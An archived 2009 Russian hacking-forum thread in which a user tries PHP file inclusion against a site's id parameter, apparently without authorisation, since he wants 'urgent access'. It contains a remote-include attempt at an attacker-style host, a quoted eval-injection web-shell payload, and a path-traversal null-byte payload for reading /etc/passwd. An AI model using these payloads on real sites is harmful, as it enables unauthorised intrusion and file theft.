ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Можно ли сделать php inj?
  #1  
Старый 24.01.2009, 06:55
ttt0z
Познающий
Регистрация: 18.11.2007
Сообщений: 69
Провел на форуме:
940986

Репутация: 6
По умолчанию Можно ли сделать php inj?

Если пишу в адрессную строку:

http://www.site.ru/index.php?id=http://hack.ru/1

Выводит:

Warning: main(texts/http://hack.ru/1.php) [function.main]: failed to open stream: No such file or directory in /home/httpd/virtual/www.site.ru/index.php on line 6

Warning: main(texts/http://hack.ru/1.php) [function.main]: failed to open stream: No such file or directory in /home/httpd/virtual/www.site.ru/index.php on line 6

Warning: main() [function.include]: Failed opening 'texts/http://hack.ru/1.php' for inclusion (include_path='.:/usr/local/share/pear') in /home/httpd/virtual/www.site.ru/index.php on line 6
 
Ответить с цитированием

  #2  
Старый 24.01.2009, 07:00
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

и что? ремоут-инклуда тут нет, возможен локальный инклуд, но полностью не уверен
 
Ответить с цитированием

  #3  
Старый 24.01.2009, 07:15
ttt0z
Познающий
Регистрация: 18.11.2007
Сообщений: 69
Провел на форуме:
940986

Репутация: 6
По умолчанию

нужно сделать удаленную инъекцию. может все таки есть какой-то вариант?

может это поможет:
eval

Еще одна «злая» функция – eval. В PHP она интерпретирует переданную ей строку как PHP-код. Без этой функции можно вполне обойтись практически в любом PHP-приложении. Очень часто ее применяют для удобной смены templat'ов - тем какого-нибудь движка. Хотя сделать то же самое можно и без eval. С помощью вот такой строки был взломан один хацкерский ресурс, имя которого называть я не буду:

eval("\$$register_poll_vars[$i] = \"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";")

Передавая в GET'е параметр id в виде id={${php_code}}, я получили веб-шелл. Что означает ${php_code}}, читай ниже.

preg_replace - зачем там /e?

Функция preg_replace заменяет подстроку (первый параметр), заданную регулярным выражением, на строку (второй параметр), которая также может быть задана регулярным выражением в данной строке (третий параметр). Также существует необязательный 4-ый параметр, но он нас не интересует.
 
Ответить с цитированием

  #4  
Старый 24.01.2009, 07:22
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

а при чем тут евал?
 
Ответить с цитированием

  #5  
Старый 24.01.2009, 07:24
ttt0z
Познающий
Регистрация: 18.11.2007
Сообщений: 69
Провел на форуме:
940986

Репутация: 6
По умолчанию

я сказал может поможет. это из статьи
 
Ответить с цитированием

  #6  
Старый 24.01.2009, 07:25
ttt0z
Познающий
Регистрация: 18.11.2007
Сообщений: 69
Провел на форуме:
940986

Репутация: 6
По умолчанию

как выйти из директории texts? что бы сработал http:// ?
может что то типа /../texts...
?
 
Ответить с цитированием

  #7  
Старый 24.01.2009, 07:31
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

попробуй так например
Цитата:
http://www.site.ru/index.php?id=../../../../../../etc/passwd%00
ну и вместо /etc/passwd путь до файла, который ты хочешь рочесть, правда не всегда получится...
 
Ответить с цитированием

  #8  
Старый 24.01.2009, 07:35
ttt0z
Познающий
Регистрация: 18.11.2007
Сообщений: 69
Провел на форуме:
940986

Репутация: 6
По умолчанию

Failed opening 'texts/../../../../../
не выходит из папки видимо..
может поменять значение переменной, которая отвечает за это? только как это можно сделать?
 
Ответить с цитированием

  #9  
Старый 24.01.2009, 07:45
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

какой толк подставлять что-то куда-то, если не знаешь как это работает? почитал бы статьи, почитал бы маны по PHP.. не задавал бы таких вопросов..
 
Ответить с цитированием

  #10  
Старый 24.01.2009, 07:47
ttt0z
Познающий
Регистрация: 18.11.2007
Сообщений: 69
Провел на форуме:
940986

Репутация: 6
По умолчанию

толк в доступе к сайту.
читать все и разбирать нет сейчас времени.
нужен доступ срочно. по этому и прошу помощи в том в чем плохо разбираюсь пока что.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новичкам о дорвеях троль909 Статьи 21 03.05.2010 01:11
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
что можно сделать с чатами mail.ru??? Kaban Чаты 10 24.04.2006 07:47
Можно ли что-то с этим сделать? FoGorm Форумы 8 31.03.2006 00:10
Что можно сделать с ip адресом iRedX ICQ 1 01.04.2003 21:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ